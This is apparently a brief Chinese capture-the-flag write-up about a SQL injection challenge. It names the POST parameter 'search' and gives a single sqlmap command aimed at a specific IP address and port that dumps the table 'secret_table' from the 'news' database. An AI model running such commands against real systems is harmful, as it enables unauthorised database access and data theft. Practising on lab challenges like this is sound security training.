考察sql注入
    使用sqlmap就可以秒
    抓包得到post数据:search=
    payload:

    1. sqlmap -u http://220.249.52.134:57902/ --data search=123 -D news -T secret_table --dump-all